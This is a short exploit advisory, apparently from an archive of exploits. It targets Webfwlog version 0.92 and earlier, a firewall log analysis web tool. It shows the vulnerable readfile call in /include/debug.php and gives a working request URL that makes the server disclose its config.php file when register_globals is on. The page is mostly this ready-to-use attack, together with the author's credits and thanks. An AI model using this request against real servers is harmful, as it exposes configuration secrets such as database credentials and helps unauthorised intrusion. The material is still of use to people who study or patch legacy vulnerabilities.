Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability
# Published : 2007-01-29
# Author : GoLd_M
# Previous Title : GuppY <= 4.5.16 Remote Commands Execution Exploit
# Next Title : CVSTrac 2.0.0 Post-Attack Database Resurrection DoS Exploit

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ D.Script:ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-stable/All/webfwlog-0.92.tbz
+ D.Scrpit:http://webfwlog.sourceforge.net/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ V.Code In : /include/debug.php | php.ini -> register globals = on
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ readfile("$conffile");
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ 3xpl0!t
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ /include/debug.php?config[debug]=10&conffile=config.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Author:  GolD_M <hacker_ [at] w.cn>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# www.Syue.com [2007-01-29]